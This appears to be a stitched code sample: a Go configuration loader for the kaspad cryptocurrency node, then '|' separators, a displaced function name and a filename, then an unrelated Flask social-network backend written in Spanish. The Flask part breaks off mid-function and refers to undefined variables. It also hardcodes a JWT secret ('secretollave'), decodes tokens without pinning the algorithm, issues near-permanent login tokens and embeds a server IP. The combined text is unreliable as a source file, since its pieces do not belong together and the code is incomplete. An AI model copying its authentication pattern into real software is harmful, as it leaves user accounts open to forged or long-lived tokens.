	RPCMaxConcurrentReqs int `long:"rpcmaxconcurrentreqs" description:"Max number of RPC requests that may be processed concurrently"`
DisableRPC bool `long:"norpc" description:"Disable built-in RPC server"`
DisableDNSSeed bool `long:"nodnsseed" description:"Disable DNS seeding for peers"`
DNSSeed string `long:"dnsseed" description:"Override DNS seeds with specified hostname (Only 1 hostname allowed)"`
GRPCSeed string `long:"grpcseed" description:"Hostname of gRPC server for seeding peers"`
ExternalIPs []string `long:"externalip" description:"Add an ip to the list of local addresses we claim to listen on to peers"`
Proxy string `long:"proxy" description:"Connect via SOCKS5 proxy (eg. 127.0.0.1:9050)"`
ProxyUser string `long:"proxyuser" description:"Username for proxy server"`
ProxyPass string `long:"proxypass" default-mask:"-" description:"Password for proxy server"`
DbType string `long:"dbtype" description:"Database backend to use for the Block DAG"`
	Profile string `long:"profile" description:"Enable HTTP profiling on given port -- NOTE port must be between 1024 and 65535"`
LogLevel string `short:"d" long:"loglevel" description:"Logging level for all subsystems {trace, debug, info, warn, error, critical} -- You may also specify <subsystem>=<level>,<subsystem2>=<level>,... to set the log level for individual subsystems -- Use show to list available subsystems"`
Upnp bool `long:"upnp" description:"Use UPnP to map our listening port outside of NAT"`
MinRelayTxFee float64 `long:"minrelaytxfee" description:"The minimum transaction fee in KAS/kB to be considered a non-zero fee."`
MaxOrphanTxs uint64 `long:"maxorphantx" description:"Max number of orphan transactions to keep in memory"`
BlockMaxMass uint64 `long:"blockmaxmass" description:"Maximum transaction mass to be used when creating a block"`
UserAgentComments []string `long:"uacomment" description:"Comment to add to the user agent -- See BIP 14 for more information."`
NoPeerBloomFilters bool `long:"nopeerbloomfilters" description:"Disable bloom filtering support"`
SigCacheMaxSize uint `long:"sigcachemaxsize" description:"The maximum number of entries in the signature verification cache"`
BlocksOnly bool `long:"blocksonly" description:"Do not accept transactions from remote peers."`
RelayNonStd bool `long:"relaynonstd" description:"Relay non-standard transactions regardless of the default settings for the active network."`
RejectNonStd bool `long:"rejectnonstd" description:"Reject non-standard transactions regardless of the default settings for the active network."`
ResetDatabase bool `long:"reset-db" description:"Reset database before starting node. It's needed when switching between subnetworks."`
MaxUTXOCacheSize uint64 `long:"maxutxocachesize" description:"Max size of loaded UTXO into ram from the disk in bytes"`
UTXOIndex bool `long:"utxoindex" description:"Enable the UTXO index"`
	IsArchivalNode bool `long:"archival" description:"Run as an archival node: don't delete old block data when moving the pruning point (Warning: heavy disk usage)"`
AllowSubmitBlockWhenNotSynced bool `long:"allow-submit-block-when-not-synced" hidden:"true" description:"Allow the node to accept blocks from RPC while not synced (this flag is mainly used for testing)"`
EnableSanityCheckPruningUTXOSet bool `long:"enable-sanity-check-pruning-utxo" hidden:"true" description:"When moving the pruning point - check that the utxo set matches the utxo commitment"`
NetworkFlags
ServiceOptions *ServiceOptions
}
// Config defines the configuration options for kaspad.
//
// See loadConfig for details on the configuration load process.
type Config struct {
*Flags
Lookup func(string) ([]net.IP, error)
Dial func(string, string, time.Duration) (net.Conn, error)
MiningAddrs []util.Address
MinRelayTxFee util.Amount
Whitelists []*net.IPNet
SubnetworkID *externalapi.DomainSubnetworkID // nil in full nodes
}
// ServiceOptions defines the configuration options for the daemon as a service on
// Windows.
type ServiceOptions struct {
ServiceCommand string `short:"s" long:"service" description:"Service command {install, remove, start, stop}"`
}
// cleanAndExpandPath expands environment variables and leading ~ in the
// passed path, cleans the result, and returns it.
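//
// For example (illustrative), "~/logs" has "~" replaced with the parent
// directory of DefaultAppDir, and "$HOME/logs" has $HOME expanded via
// os.ExpandEnv before the result is cleaned.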
func
|
(path string) string {
// Expand initial ~ to OS specific home directory.
if strings.HasPrefix(path, "~") {
homeDir := filepath.Dir(DefaultAppDir)
path = strings.Replace(path, "~", homeDir, 1)
}
	// NOTE: os.ExpandEnv doesn't work with Windows-style %VARIABLE%,
	// but the variables can still be expanded via POSIX-style $VARIABLE.
return filepath.Clean(os.ExpandEnv(path))
}
// newConfigParser returns a new command line flags parser.
func newConfigParser(cfgFlags *Flags, options flags.Options) *flags.Parser {
parser := flags.NewParser(cfgFlags, options)
if runtime.GOOS == "windows" {
parser.AddGroup("Service Options", "Service Options", cfgFlags.ServiceOptions)
}
return parser
}
func defaultFlags() *Flags {
return &Flags{
ConfigFile: defaultConfigFile,
LogLevel: defaultLogLevel,
TargetOutboundPeers: defaultTargetOutboundPeers,
MaxInboundPeers: defaultMaxInboundPeers,
BanDuration: defaultBanDuration,
BanThreshold: defaultBanThreshold,
RPCMaxClients: defaultMaxRPCClients,
RPCMaxWebsockets: defaultMaxRPCWebsockets,
RPCMaxConcurrentReqs: defaultMaxRPCConcurrentReqs,
AppDir: defaultDataDir,
RPCKey: defaultRPCKeyFile,
RPCCert: defaultRPCCertFile,
BlockMaxMass: defaultBlockMaxMass,
MaxOrphanTxs: defaultMaxOrphanTransactions,
SigCacheMaxSize: defaultSigCacheMaxSize,
MinRelayTxFee: defaultMinRelayTxFee,
MaxUTXOCacheSize: defaultMaxUTXOCacheSize,
ServiceOptions: &ServiceOptions{},
}
}
// DefaultConfig returns the default kaspad configuration
func DefaultConfig() *Config {
config := &Config{Flags: defaultFlags()}
config.NetworkFlags.ActiveNetParams = &dagconfig.MainnetParams
return config
}
// LoadConfig initializes and parses the config using a config file and command
// line options.
//
// The configuration proceeds as follows:
// 1) Start with a default config with sane settings
// 2) Pre-parse the command line to check for an alternative config file
// 3) Load configuration file overwriting defaults with any specified options
// 4) Parse CLI options and overwrite/add any specified options
//
// The above results in kaspad functioning properly without any config settings
// while still allowing the user to override settings with config files and
// command line options. Command line options always take precedence.
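//
// A minimal caller sketch (hypothetical):
//
//	cfg, err := LoadConfig()
//	if err != nil {
//		fmt.Fprintln(os.Stderr, err)
//		os.Exit(1)
//	}
//	_ = cfg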
func LoadConfig() (*Config, error) {
cfgFlags := defaultFlags()
// Pre-parse the command line options to see if an alternative config
// file or the version flag was specified. Any errors aside from the
// help message error can be ignored here since they will be caught by
// the final parse below.
preCfg := cfgFlags
preParser := newConfigParser(preCfg, flags.HelpFlag)
_, err := preParser.Parse()
if err != nil {
var flagsErr *flags.Error
if ok := errors.As(err, &flagsErr); ok && flagsErr.Type == flags.ErrHelp {
return nil, err
}
}
appName := filepath.Base(os.Args[0])
appName = strings.TrimSuffix(appName, filepath.Ext(appName))
usageMessage := fmt.Sprintf("Use %s -h to show usage", appName)
// Show the version and exit if the version flag was specified.
if preCfg.ShowVersion {
fmt.Println(appName, "version", version.Version())
os.Exit(0)
}
// Load additional config from file.
var configFileError error
parser := newConfigParser(cfgFlags, flags.Default)
cfg := &Config{
Flags: cfgFlags,
}
if !preCfg.Simnet || preCfg.ConfigFile != defaultConfigFile {
if _, err := os.Stat(preCfg.ConfigFile); os.IsNotExist(err) {
err := createDefaultConfigFile(preCfg.ConfigFile)
if err != nil {
return nil, errors.Wrap(err, "Error creating a default config file")
}
}
err := flags.NewIniParser(parser).ParseFile(preCfg.ConfigFile)
if err != nil {
if pErr := &(os.PathError{}); !errors.As(err, &pErr) {
return nil, errors.Wrapf(err, "Error parsing config file: %s\n\n%s", err, usageMessage)
}
configFileError = err
}
}
// Parse command line options again to ensure they take precedence.
_, err = parser.Parse()
if err != nil {
var flagsErr *flags.Error
if ok := errors.As(err, &flagsErr); !ok || flagsErr.Type != flags.ErrHelp {
return nil, errors.Wrapf(err, "Error parsing command line arguments: %s\n\n%s", err, usageMessage)
}
return nil, err
}
// Create the home directory if it doesn't already exist.
funcName := "loadConfig"
err = os.MkdirAll(DefaultAppDir, 0700)
if err != nil {
// Show a nicer error message if it's because a symlink is
// linked to a directory that does not exist (probably because
// it's not mounted).
var e *os.PathError
if ok := errors.As(err, &e); ok && os.IsExist(err) {
if link, lerr := os.Readlink(e.Path); lerr == nil {
str := "is symlink %s -> %s mounted?"
err = errors.Errorf(str, e.Path, link)
}
}
str := "%s: Failed to create home directory: %s"
err := errors.Errorf(str, funcName, err)
return nil, err
}
err = cfg.ResolveNetwork(parser)
if err != nil {
return nil, err
}
// Set the default policy for relaying non-standard transactions
// according to the default of the active network. The set
// configuration value takes precedence over the default value for the
// selected network.
relayNonStd := cfg.NetParams().RelayNonStdTxs
switch {
case cfg.RelayNonStd && cfg.RejectNonStd:
str := "%s: rejectnonstd and relaynonstd cannot be used " +
"together -- choose only one"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
case cfg.RejectNonStd:
relayNonStd = false
case cfg.RelayNonStd:
relayNonStd = true
}
cfg.RelayNonStd = relayNonStd
cfg.AppDir = cleanAndExpandPath(cfg.AppDir)
// Append the network type to the app directory so it is "namespaced"
// per network.
// All data is specific to a network, so namespacing the data directory
// means each individual piece of serialized data does not have to
// worry about changing names per network and such.
cfg.AppDir = filepath.Join(cfg.AppDir, cfg.NetParams().Name)
// Logs directory is usually under the home directory, unless otherwise specified
if cfg.LogDir == "" {
cfg.LogDir = filepath.Join(cfg.AppDir, defaultLogDirname)
}
cfg.LogDir = cleanAndExpandPath(cfg.LogDir)
// Special show command to list supported subsystems and exit.
if cfg.LogLevel == "show" {
fmt.Println("Supported subsystems", logger.SupportedSubsystems())
os.Exit(0)
}
// Initialize log rotation. After log rotation has been initialized, the
// logger variables may be used.
logger.InitLog(filepath.Join(cfg.LogDir, defaultLogFilename), filepath.Join(cfg.LogDir, defaultErrLogFilename))
// Parse, validate, and set debug log level(s).
if err := logger.ParseAndSetLogLevels(cfg.LogLevel); err != nil {
err := errors.Errorf("%s: %s", funcName, err.Error())
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Validate profile port number
if cfg.Profile != "" {
profilePort, err := strconv.Atoi(cfg.Profile)
if err != nil || profilePort < 1024 || profilePort > 65535 {
str := "%s: The profile port must be between 1024 and 65535"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
}
// Don't allow ban durations that are too short.
if cfg.BanDuration < time.Second {
str := "%s: The banduration option may not be less than 1s -- parsed [%s]"
err := errors.Errorf(str, funcName, cfg.BanDuration)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Validate any given whitelisted IP addresses and networks.
if len(cfg.Whitelists) > 0 {
var ip net.IP
cfg.Whitelists = make([]*net.IPNet, 0, len(cfg.Flags.Whitelists))
for _, addr := range cfg.Flags.Whitelists {
_, ipnet, err := net.ParseCIDR(addr)
if err != nil {
ip = net.ParseIP(addr)
if ip == nil {
str := "%s: The whitelist value of '%s' is invalid"
err = errors.Errorf(str, funcName, addr)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
var bits int
if ip.To4() == nil {
// IPv6
bits = 128
} else {
bits = 32
}
ipnet = &net.IPNet{
IP: ip,
Mask: net.CIDRMask(bits, bits),
}
}
cfg.Whitelists = append(cfg.Whitelists, ipnet)
}
}
// --addPeer and --connect do not mix.
if len(cfg.AddPeers) > 0 && len(cfg.ConnectPeers) > 0 {
str := "%s: the --addpeer and --connect options can not be " +
"mixed"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// --proxy or --connect without --listen disables listening.
if (cfg.Proxy != "" || len(cfg.ConnectPeers) > 0) &&
len(cfg.Listeners) == 0 {
cfg.DisableListen = true
}
// ConnectPeers means no DNS seeding and no outbound peers
if len(cfg.ConnectPeers) > 0 {
cfg.DisableDNSSeed = true
cfg.TargetOutboundPeers = 0
}
// Add the default listener if none were specified. The default
// listener is all addresses on the listen port for the network
// we are to connect to.
if len(cfg.Listeners) == 0 {
cfg.Listeners = []string{
net.JoinHostPort("", cfg.NetParams().DefaultPort),
}
}
if cfg.DisableRPC {
log.Infof("RPC service is disabled")
}
// Add the default RPC listener if none were specified. The default
// RPC listener is all addresses on the RPC listen port for the
// network we are to connect to.
if !cfg.DisableRPC && len(cfg.RPCListeners) == 0 {
cfg.RPCListeners = []string{
net.JoinHostPort("", cfg.NetParams().RPCPort),
}
}
if cfg.RPCMaxConcurrentReqs < 0 {
str := "%s: The rpcmaxwebsocketconcurrentrequests option may " +
"not be less than 0 -- parsed [%d]"
err := errors.Errorf(str, funcName, cfg.RPCMaxConcurrentReqs)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
	// Validate the minrelaytxfee.
cfg.MinRelayTxFee, err = util.NewAmount(cfg.Flags.MinRelayTxFee)
if err != nil {
str := "%s: invalid minrelaytxfee: %s"
err := errors.Errorf(str, funcName, err)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Disallow 0 and negative min tx fees.
if cfg.MinRelayTxFee == 0 {
str := "%s: The minrelaytxfee option must be greater than 0 -- parsed [%d]"
err := errors.Errorf(str, funcName, cfg.MinRelayTxFee)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Limit the max block mass to a sane value.
if cfg.BlockMaxMass < blockMaxMassMin || cfg.BlockMaxMass >
blockMaxMassMax {
str := "%s: The blockmaxmass option must be in between %d " +
"and %d -- parsed [%d]"
err := errors.Errorf(str, funcName, blockMaxMassMin,
blockMaxMassMax, cfg.BlockMaxMass)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Look for illegal characters in the user agent comments.
for _, uaComment := range cfg.UserAgentComments {
if strings.ContainsAny(uaComment, "/:()") {
err := errors.Errorf("%s: The following characters must not "+
"appear in user agent comments: '/', ':', '(', ')'",
funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
}
// Add default port to all listener addresses if needed and remove
// duplicate addresses.
cfg.Listeners, err = network.NormalizeAddresses(cfg.Listeners,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
// Add default port to all rpc listener addresses if needed and remove
// duplicate addresses.
cfg.RPCListeners, err = network.NormalizeAddresses(cfg.RPCListeners,
cfg.NetParams().RPCPort)
if err != nil {
return nil, err
}
// Disallow --addpeer and --connect used together
if len(cfg.AddPeers) > 0 && len(cfg.ConnectPeers) > 0 {
str := "%s: --addpeer and --connect can not be used together"
err := errors.Errorf(str, funcName)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
// Add default port to all added peer addresses if needed and remove
// duplicate addresses.
cfg.AddPeers, err = network.NormalizeAddresses(cfg.AddPeers,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
cfg.ConnectPeers, err = network.NormalizeAddresses(cfg.ConnectPeers,
cfg.NetParams().DefaultPort)
if err != nil {
return nil, err
}
// Setup dial and DNS resolution (lookup) functions depending on the
// specified options. The default is to use the standard
// net.DialTimeout function as well as the system DNS resolver. When a
// proxy is specified, the dial function is set to the proxy specific
// dial function.
cfg.Dial = net.DialTimeout
cfg.Lookup = net.LookupIP
if cfg.Proxy != "" {
_, _, err := net.SplitHostPort(cfg.Proxy)
if err != nil {
str := "%s: Proxy address '%s' is invalid: %s"
err := errors.Errorf(str, funcName, cfg.Proxy, err)
fmt.Fprintln(os.Stderr, err)
fmt.Fprintln(os.Stderr, usageMessage)
return nil, err
}
proxy := &socks.Proxy{
Addr: cfg.Proxy,
Username: cfg.ProxyUser,
Password: cfg.ProxyPass,
}
cfg.Dial = proxy.DialTimeout
}
// Warn about missing config file only after all other configuration is
// done. This prevents the warning on help messages and invalid
// options. Note this should go directly before the return.
if configFileError != nil {
log.Warnf("%s", configFileError)
}
return cfg, nil
}
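
// dialPeerExample is an illustrative sketch, not part of the original file:
// it shows how callers would use the cfg.Dial function chosen above (plain
// net.DialTimeout, or the SOCKS dialer when --proxy is set). The peer address
// is a placeholder, and the Config type is assumed from earlier in this file.
func dialPeerExample(cfg *Config) (net.Conn, error) {
	return cfg.Dial("tcp", "peer.example.com:16111", 30*time.Second)
}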
// createDefaultConfigFile copies the file sample-kaspad.conf to the given
// destination path.
func createDefaultConfigFile(destinationPath string) error {
	// Create the destination directory if it does not exist
err := os.MkdirAll(filepath.Dir(destinationPath), 0700)
if err != nil {
return err
}
dest, err := os.OpenFile(destinationPath,
os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600)
if err != nil {
return err
}
defer dest.Close()
_, err = dest.WriteString(sampleConfig)
return err
}
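
// ensureConfigFileExample is an illustrative sketch, not part of the original
// file: a typical caller writes the sample config only when no file exists yet
// at the given path, then proceeds with normal config loading.
func ensureConfigFileExample(path string) error {
	if _, err := os.Stat(path); os.IsNotExist(err) {
		return createDefaultConfigFile(path)
	}
	return nil
}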
|
cleanAndExpandPath
|
QkLc.py
|
# from flask import Flask, Blueprint
# from flask_sqlalchemy import SQLAlchemy
# from flask_login import LoginManager
# import os
from flask import Flask, jsonify, request, make_response, redirect, url_for
import jwt
import datetime
import os
import re
from functools import wraps
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from sqlalchemy import select
from flask_migrate import Migrate, migrate
from flask_cors import CORS
from sqlalchemy import inspect
from sqlalchemy import Table, Column, MetaData, Integer, Computed
from numpy import array
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secretollave'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///todo.db'
ABSOLUTE_PATH_TO_YOUR_FOLDER ='/home/dani/flask/static/fotosPerfil'
ABSOLUTE_PATH_TO_YOUR_PDF_FOLDER ='/home/dani/flask/static/pdf'
CORS(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# Models
class Usuario(db.Model):
nick = db.Column(db.String(20), primary_key=True)
Nombre_de_usuario = db.Column(db.String(50))
password = db.Column(db.String(50))
e_mail = db.Column(db.String(50), unique=True, nullable=False)
descripcion = db.Column(db.String(1000))
link = db.Column(db.String(200))
foto_de_perfil = db.Column(db.String(400))
class Sigue(db.Model):
#id = db.Column(db.Integer, primary_key=True )
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
Usuario_Nickb = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Chat(db.Model):
#Column('timestamp', TIMESTAMP(timezone=False), nullable=False, default=datetime.now())
timestamp = db.Column(db.TIMESTAMP, nullable=False,
server_default=db.func.now(),
onupdate=db.func.now())
mensaje = db.Column(db.String(1000))
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
Usuario_Nickb = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Publicacion(db.Model):
id = db.Column(Integer,primary_key=True)
#id = db.Sequence('id', start=1, increment=1)
descripcion = db.Column(db.String(1000))
#Column('timestamp', TIMESTAMP(timezone=False), nullable=False, default=datetime.now())
timestamp = db.Column(db.TIMESTAMP, nullable=False,
server_default=db.func.now(),
onupdate=db.func.now())
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'))
class Propia(db.Model):
pdf = db.Column(db.String(400))
id = db.Column(db.String(20), db.ForeignKey('publicacion.id'),primary_key=True)
class Recomendacion(db.Model):
link = db.Column(db.String(200),nullable=False)
titulo = db.Column(db.String(200),nullable=False)
autor = db.Column(db.String(200),nullable=False)
id = db.Column(db.String(20), db.ForeignKey('publicacion.id'),primary_key=True)
class Tematica(db.Model):
tema = db.Column(db.String(50), primary_key=True )
class Notificaciones(db.Model):
id = db.Column(db.Integer, primary_key=True )
fecha = db.Column(db.Date)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Prefiere(db.Model):
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
tema = db.Column(db.String(50), db.ForeignKey('tematica.tema'),primary_key=True)
class Trata_pub_del_tema(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
tema = db.Column(db.String(50), db.ForeignKey('tematica.tema'),primary_key=True)
class Gusta(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Comenta(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
comentario = db.Column(db.String(1000))
class Guarda(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
class Trata(db.Model):
id_publi = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
id_notif = db.Column(db.String(20), db.ForeignKey('notificaciones.id'),primary_key=True)
class Genera(db.Model):
id = db.Column(db.Integer, db.ForeignKey('publicacion.id'),primary_key=True)
Usuario_Nicka = db.Column(db.String(20), db.ForeignKey('usuario.nick'),primary_key=True)
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
#token = request.args.get('token') #http://127.0.0.1:5000/route?token=djsnvidnoffofn
#data = request.get_json()
token = request.headers['token']
#token = data['token']
if not token:
return jsonify({'error': 'Token no existe'}), 403
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = Usuario.query.filter_by(nick=data['nick']).first()
current_user = data['nick']
except:
return jsonify({'error': 'Token no valido'}), 403
return f(current_user,*args, **kwargs)
return decorated
def token_required_id(f):
@wraps(f)
def decorated(*args, **kwargs):
#token = request.args.get('token') #http://127.0.0.1:5000/route?token=djsnvidnoffofn
#data = request.get_json()
token = request.headers['token']
#token = data['token']
if not token:
return jsonify({'error': 'Token no existe'}), 403
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = Usuario.query.filter_by(nick=data['nick']).first()
current_user = data['nick']
current_id = Publicacion.query.filter_by(id=data['id']).first()
_id = data['id']
except:
return jsonify({'error': 'Token no valido'}), 403
return f(current_user,_id,*args, **kwargs)
return decorated
@app.route('/unprotected')
def unprotected():
return jsonify({'message': 'Puede entrar tol mundo'})
@app.route('/protected')
@token_required
def protected(current_user):
print(current_user)
return jsonify({'message': 'Puedes entrar si puedes'})
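
# Illustrative client-side sketch, not part of the original app: it shows how a
# caller obtains a JWT from /login and passes it in the "token" header that the
# token_required decorator reads. The base URL and credentials are placeholders.
def _example_client():
    import requests
    base = "http://127.0.0.1:5000"
    login = requests.post(base + "/login",
                          json={"nickOcorreo": "alice", "password": "S3cret!pw"})
    token = login.json()["token"]
    # Any protected route expects the raw token in a "token" header.
    return requests.get(base + "/protected", headers={"token": token}).json()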
# Login route
@app.route('/register', methods=['POST'])
def add_data():
data= request.get_json()
#nick = request.form.get("nick")
#password = request.form.get("password")
#e_mail = request.form.get("e_mail")
user = Usuario.query.filter_by(e_mail=data['e_mail']).first()
nick = Usuario.query.filter_by(nick=data['nick']).first()
    if user: # if this returns something, the email already exists
        return jsonify({'error': 'Existe correo'}) # JSON error: email already exists
if nick:
return jsonify({'error': 'Existe nick'})
#if (check_email(e_mail) == True and check_password(data['password']) == True ):
register = Usuario(nick=data['nick'],password=generate_password_hash(data['password']), e_mail=data['e_mail'],foto_de_perfil="platon.jpg")
db.session.add(register)
db.session.commit()
token = jwt.encode({'nick' : data['nick'], 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/login', methods=['POST'])
def login():
    # auth = request.authorization  # use this instead if doing HTTP basic auth
data= request.get_json()
if '@' in data['nickOcorreo']:
user = Usuario.query.filter_by(e_mail=data['nickOcorreo']).first()
else:
user = Usuario.query.filter_by(nick=data['nickOcorreo']).first()
if not user:
        return jsonify({'error': 'No existe ese usuario'})  # error: unknown user
if not check_password_hash(user.password, data['password']):
        return jsonify({'error': 'Mal contraseña'})  # error: wrong password
token = jwt.encode({'nick' : data['nickOcorreo'], 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=9999999)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/editarPerfil', methods=['GET'])
@token_required
def editarPerfilget(current_user):
s = select([Usuario.Nombre_de_usuario, Usuario.descripcion,Usuario.link, Usuario.foto_de_perfil]).where((Usuario.nick == current_user))
result = db.session.execute(s)
seguidos= db.session.query(Sigue).filter(Sigue.Usuario_Nicka == current_user ).count()
seguidores= db.session.query(Sigue).filter(Sigue.Usuario_Nickb == current_user ).count()
nposts= db.session.query(Publicacion).filter(Publicacion.Usuario_Nicka == current_user ).count()
tema = select([Prefiere.tema]).where((Prefiere.Usuario_Nicka == current_user))
temas = db.session.execute(tema)
vector = []
for row in temas:
vector += row
for row in result:
fila = {
"nick": current_user,
"nombre_de_usuario":row[0],
"descripcion":row[1],
"link":row[2],
"foto_de_perfil": 'http://51.255.50.207:5000/display/' + row[3],
"nsiguiendo": seguidos,
"nseguidores": seguidores,
"nposts": nposts,
"tematicas": vector
#"foto_de_perfil" :url_for('static', filename='fotosPerfil/' + row[3])
}
return fila
@app.route('/display/<filename>')
def foto(filename):
return redirect(url_for('static', filename='fotosPerfil/' + filename),code = 301)
@app.route('/editarPerfil', methods=['POST'])
@token_required
def editarPerfilpost(current_user):
data= request.get_json()
user = Usuario.query.filter_by(nick=current_user).first()
user.Nombre_de_usuario = data['nombre_de_usuario']
print(data['nombre_de_usuario'])
print(data['descripcion'])
print(data['link'])
print(data['tematicas'])
user.descripcion = data['descripcion']
user.link = data['link']
tematicas = data['tematicas']
for temas in tematicas:
tema = Prefiere.query.filter_by(tema=temas).first()
if not tema:
tema = Prefiere(Usuario_Nicka=current_user, tema = temas)
db.session.add(tema)
#db.session.commit()
#cambia_foto
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/actualizarImagen', methods=['POST'])
@token_required
def actualizarImagen(current_user):
user = Usuario.query.filter_by(nick=current_user).first()
    if request.files.get('nueva_foto') is not None:  # data['cambia_foto']
file = request.files['nueva_foto']
print(request.files['nueva_foto'])
filename = secure_filename(file.filename)
file.save(os.path.join(ABSOLUTE_PATH_TO_YOUR_FOLDER, filename))
user.foto_de_perfil = filename
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/subirPost', methods=['POST'])
@token_required
def subirPost(current_user):
data= request.get_json()
    publicacion = Publicacion(descripcion=data['descripcion'], Usuario_Nicka=current_user)  # grab the generated id after commit
db.session.add(publicacion)
db.session.commit()
tematicas = data['tematicas']
for temas in tematicas:
temita = Tematica.query.filter_by(tema=temas).first()
if temita:
nuevo = Trata_pub_del_tema(id=publicacion.id, tema = temita.tema)
db.session.add(nuevo)
db.session.commit()
    if (data['tipo']=="1"): # article
return jsonify({'id' : publicacion.id})
#guardarPDF(request.files['pdf'], publicacion.id)
    elif(data['tipo']=="2"): # recommendation
recomendacion = Recomendacion(link=data['link'],titulo=data['titulo'], autor = data['autor'], id = publicacion.id)
db.session.add(recomendacion)
db.session.commit()
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
@app.route('/subirPdf', methods=['POST'])
@token_required
def guardarPDF(current_user):
_id=request.headers['id']
propia = Propia( id = _id)
db.session.add(propia)
db.session.commit()
propia = Propia.query.filter_by(id=_id).first()
    if request.files.get('pdf') is not None:
file = request.files['pdf']
#print(pdf)
filename = secure_filename(file.filename)
file.save(os.path.join(ABSOLUTE_PATH_TO_YOUR_PDF_FOLDER, filename))
propia.pdf = filename
db.session.add(propia)
db.session.commit()
else:
print("pdf nulisimo")
token = jwt.encode({'nick' : current_user, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)}, app.config['SECRET_KEY'])
return jsonify({'token' : token.decode('UTF-8')})
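
# Illustrative client-side sketch, not part of the original app: the two-step
# flow implied by /subirPost and /subirPdf for an article (tipo "1") -- create
# the post, read back its id, then upload the PDF with that id in the headers.
# The base URL is a placeholder.
def _example_upload_article(token, pdf_path):
    import requests
    base = "http://127.0.0.1:5000"
    post = requests.post(base + "/subirPost", headers={"token": token},
                         json={"descripcion": "My paper", "tematicas": [], "tipo": "1"})
    post_id = post.json()["id"]
    with open(pdf_path, "rb") as fh:
        return requests.post(base + "/subirPdf",
                             headers={"token": token, "id": str(post_id)},
                             files={"pdf": fh}).json()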
@app.route('/getPostsPropios', methods=['GET'])
@token_required
def getPostsPropios(current_user):
data= request.get_json()
x = select([Usuario.Nombre_de_usuario]).where((Usuario.nick == current_user))
resultb = db.session.execute(x)
Nombre_de_usuario = ""
for b in resultb:
Nombre_de_usuario=b.Nombre_de_usuario
id = select([Publicacion.id]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
descripcion = select( [Publicacion.descripcion]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
|
resultsss = db.session.execute(timestamp)
vector0 = []
vector1 = []
vector2 = []
Gustas = []
Comentarios= []
Guardados= []
for r in results:
#print(str(r))
vector0 += r
        Gustas.append(str(db.session.query(Gusta).filter(Gusta.Usuario_Nicka == current_user, Gusta.id == r).count()))
        Comentarios.append(str(db.session.query(Comenta).filter(Comenta.Usuario_Nicka == current_user, Comenta.id == r).count()))
